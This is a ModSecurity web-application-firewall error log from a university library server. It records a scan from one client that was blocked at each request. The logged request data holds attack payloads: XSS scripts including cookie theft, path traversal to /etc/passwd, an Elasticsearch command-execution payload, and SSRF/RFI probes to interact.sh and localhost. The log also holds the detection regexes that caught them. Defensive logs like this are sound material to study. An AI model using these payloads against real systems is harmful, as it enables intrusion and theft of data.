[Tue Aug 29 11:56:43.695909 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAocynMAAAAR"]
[Tue Aug 29 11:56:44.651381 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArZP0EAAAAC"]
[Tue Aug 29 11:56:45.579440 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:225941/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAq5@VAAAAAK"]
[Tue Aug 29 11:56:46.652650 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:389833/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAq@soAAAAAM"]
[Tue Aug 29 11:56:46.751704 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArIAZAAAAAX"]
[Tue Aug 29 11:56:47.554434 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAolK6gAAAAe"]
[Tue Aug 29 11:56:47.629182 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAArZP1wAAAAC"]
[Tue Aug 29 11:56:48.567210 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArIAZ0AAAAX"]
[Tue Aug 29 11:56:48.623933 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAolK7AAAAAe"]
[Tue Aug 29 11:56:50.681254 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAq-HhgAAAAT"]
[Tue Aug 29 11:56:51.643183 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "perpustakaan.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAq5@XEAAAAK"]
[Tue Aug 29 11:56:52.821567 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArIAb0AAAAX"]
[Tue Aug 29 11:56:52.843555 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtnAAAAAA"]
[Tue Aug 29 11:56:54.774591 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAArIAcwAAAAX"]
[Tue Aug 29 11:56:56.196069 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArB17UAAAAV"]
[Tue Aug 29 11:56:57.699961 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAoz8TkAAAAS"]
[Tue Aug 29 11:56:59.787283 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8V0AAAAS"]
[Tue Aug 29 11:57:00.595130 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAolLAYAAAAe"]
[Tue Aug 29 11:57:01.628399 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAq5@awAAAAK"]
[Tue Aug 29 11:57:01.801707 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAArcTM4AAAAH"]
[Tue Aug 29 11:57:02.607062 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAm80S4AAAAF"]
[Tue Aug 29 11:57:05.569150 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAArIAe4AAAAX"]
[Tue Aug 29 11:57:07.625054 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAnEqXYAAAAO"]
[Tue Aug 29 11:57:07.801476 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8ZEAAAAS"]
[Tue Aug 29 11:57:08.628647 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-Hp0AAAAT"]
[Tue Aug 29 11:57:08.831518 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAAq-HqYAAAAT"]
